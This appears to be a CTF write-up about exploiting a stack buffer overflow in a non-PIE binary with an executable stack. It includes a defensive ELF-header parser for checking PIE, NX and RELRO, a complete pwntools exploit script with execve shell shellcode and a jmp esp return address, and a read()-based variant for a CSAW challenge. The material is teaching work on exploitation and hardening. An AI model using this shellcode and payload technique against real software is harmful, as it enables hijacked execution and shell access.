This binary had no protections (assuming ASLR is on), and it is a stripped binary. It has its own protection mechanism: it saves the return address to a memory location and restores it afterwards. So our goal is to overwrite that memory location rather than the saved EIP. After finding the offset of that memory location we can control EIP. To get execution to our shellcode we need to bypass ASLR by using a jmp esp instruction.
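The reason a fixed jmp esp address works under ASLR is that the binary itself is not position independent, and the reason stack shellcode runs at all is an executable stack. Both facts can be read straight from the ELF program headers, which is what checksec-style tools do. The following is an added example, not code from the original post: a small ELF header parser that reports PIE, NX and RELRO status. Because the CTF binary is not available here, it runs on a constructed minimal 32-bit ELF image built by build_sample_elf32 (a hypothetical helper); point parse_protections at real file bytes to audit an actual binary.

```python
import struct

# ELF constants (from the ELF specification)
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4


def build_sample_elf32(e_type, stack_flags, with_relro=False):
    """Construct a minimal 32-bit little-endian ELF image (header + program headers).
    This is a constructed sample for the parser below, not the CTF binary from the post."""
    phdrs = [
        (PT_LOAD, 0, 0x08048000, 0x08048000, 0x1000, 0x1000, PF_R | PF_X, 0x1000),
        (PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10),
    ]
    if with_relro:
        phdrs.append((PT_GNU_RELRO, 0, 0x08049000, 0x08049000, 0x100, 0x100, PF_R, 1))
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
    ehdr = e_ident + struct.pack(
        "<HHIIIIIHHHHHH",
        e_type, 3, 1, 0x08048000,  # e_type, EM_386, EV_CURRENT, e_entry
        52, 0, 0,                  # e_phoff (right after the 52-byte header), e_shoff, e_flags
        52, 32, len(phdrs),        # e_ehsize, e_phentsize, e_phnum
        40, 0, 0,                  # e_shentsize, e_shnum, e_shstrndx
    )
    return ehdr + b"".join(struct.pack("<IIIIIIII", *p) for p in phdrs)


def parse_protections(data):
    """Read PIE / NX / RELRO status from the ELF header and program headers (32- or 64-bit)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    endian = "<" if data[5] == 1 else ">"
    hdr_fmt = endian + ("HHIQQQIHHH" if is64 else "HHIIIIIHHH")
    (e_type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from(hdr_fmt, data, 16)
    stack_flags = None
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            p_type, p_flags = struct.unpack_from(endian + "II", data, off)
        else:
            # Elf32_Phdr: p_type at +0, p_flags at +24
            p_type = struct.unpack_from(endian + "I", data, off)[0]
            p_flags = struct.unpack_from(endian + "I", data, off + 24)[0]
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            relro = True
    # No PT_GNU_STACK entry means the loader falls back to an executable stack on x86.
    nx = stack_flags is not None and not (stack_flags & PF_X)
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def describe(prot):
    """Turn the flags into the findings a reviewer would raise."""
    findings = []
    if not prot["pie"]:
        findings.append("non-PIE: code addresses are fixed, so ASLR does not move gadgets in the binary's own text")
    if not prot["nx"]:
        findings.append("executable stack: data placed on the stack can be executed")
    if not prot["relro"]:
        findings.append("no RELRO: GOT entries stay writable at runtime")
    return findings or ["PIE, NX and RELRO all present"]


if __name__ == "__main__":
    weak = build_sample_elf32(ET_EXEC, PF_R | PF_W | PF_X)           # like the post's target
    hard = build_sample_elf32(ET_DYN, PF_R | PF_W, with_relro=True)  # hardened build
    for name, img in (("weak", weak), ("hard", hard)):
        print(name, parse_protections(img), describe(parse_protections(img)))
```

The "weak" sample reproduces the combination the post relies on: a non-PIE executable with an executable stack, so a jmp esp gadget has a stable address and the NOP sled plus shellcode are runnable. Building with -pie and without -z execstack removes both conditions.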
from pwn import *

# 23-byte x86 execve("/bin//sh") shellcode
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# pad to 417 bytes so the address that follows lands on the saved copy of the return address
nop_sled = b"\x90" * (417 - len(shellcode))
# overwrite the stored return address; the binary restores it into EIP on return
payload = nop_sled + shellcode + p32(0x80e7e53)
p = process('./miteegashun')
msg = p.recvlines(2)  # banner lines printed before the vulnerable read
print(msg)
p.send(payload)
p.interactive()
In the CSAW 300 question there is no jmp esp instruction, but we can call the read function and store the instruction at a static memory location, then return into it.
# payload layout (read, pop3ret, fd, static and SHELLCODE are values from that binary, not given here)
read + pop3ret + fd + static + p32(2) + static + b"\x90" * 100 + SHELLCODE
p.send(b"\xff\xe4")  # opcode for jmp esp, the 2 bytes read() writes into the static location